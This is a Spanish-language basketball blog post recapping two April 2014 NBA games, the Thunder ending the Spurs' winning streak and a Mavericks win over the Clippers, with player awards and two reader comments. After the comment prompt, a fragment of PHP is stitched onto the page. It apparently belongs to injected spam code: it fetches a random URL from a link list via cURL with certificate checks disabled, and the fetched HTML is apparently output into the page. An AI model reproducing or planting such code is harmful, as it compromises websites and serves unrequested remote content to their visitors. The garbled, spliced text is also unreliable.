La Crónica: Kevin Durant se lleva el duelo de rachas

04 de April de 2014 por txusma

La visita a Oklahoma City era la mayor piedra de toque que tenían los Spurs antes del final de la liga regular. Un partido marcado en el calendario por todos aquellos que deseaban que la racha de victorias tejanas finalizara. Pero durante la 1ª parte, si había una racha que parecía podía finalizar ésta era la de Kevin Durant (ya son 39 partidos anotando 25 o más puntos, a uno solo de Michael Jordan) ya que la defensa de Kawhi Leonard le dejó en 12 puntos con un 4 de 13 en tiros de campo. Producto del nivel humano de su máximo rival, los Spurs llegaron con 3 puntos de ventaja al descanso que se desvanecieron rápido. Durant apareció en el 3º cuarto y se fue a los 12 puntos gracias a un 6 de 9 aprovechando que Leonard se había quedado en el banco, protegido por Popovich por problemas de faltas. En la 2ª parte emergió también Russell Westbrook y juntos formaron una dupla imposible de parar para San Antonio, que dejan la racha de victorias consecutivas en 19 (94-106). ¡Pero ojo! A pesar de liderar el Oeste con tranquilidad, los Thunder les han ganado en los 4 enfrentamientos de esta temporada. Quien avisa no es traidor.

En el otro partido de la noche, victoria importantísima de Dallas que estaba prácticamente entre la espada y la pared. El gran partido de Dirk Nowitzki y su gran acierto desde más allá de la línea de 3 (14 de 29) fue suficiente para imponerse a unos Clippers en los que destacó Blake Griffin que consiguió el 4º triple-doble de su carrera (113-107). Lleva más que Kevin Love. Curioso. 

PREMIOS

MVP: Dirk Nowitzki lideró a los suyos durante todo el partido con 28 puntos y 11 rebotes pero destacamos un par de triples claves en los últimos minutos y los tiros libres que anotó y que sellaron definitivamente la victoria para los Mavs.

Sorpresa: Patty Mills lució mucho más que su compañero supuestamente titular. Acabó con 20 puntos y 6 asistencias.

Decepción: Tony Parker estuvo totalmente desaparecido. Se quedó en 6 puntos con un 3 de 10 en tiros de campo y perdió 3 balones.

Esfuerzo en vano: Blake Griffin se fue a los 25 puntos, 10 rebotes y 11 asistencias consiguiendo el 1er triple-doble del año. Debe dar mucha rabia no poder celebrar como se merece una actuación como esta.

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Esteban dice:
    #1

    seria una pena que los Mavs se quedaran fuera de PO, no por ellos en general y menos por su dueño, sino por Dirk, la verdad, se esta marcando otro temporadon, de nivel que la alcanzaría si estuviera bien rodeado para ganar otra liga, pero la verdad es que les falta demasiado

      Citar

  2. Esteban dice:
    #2

    un rookie que termina bien el año y que al parecer sera el que mas minutos tenga en PO, es Cody ZELLER, le ha costado horrores hacerse un lugar, pero nunca perdió su puesto en la rotación y este ultimo mes ha mejorado notablemente, vamos cody yo aun confió en ti!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>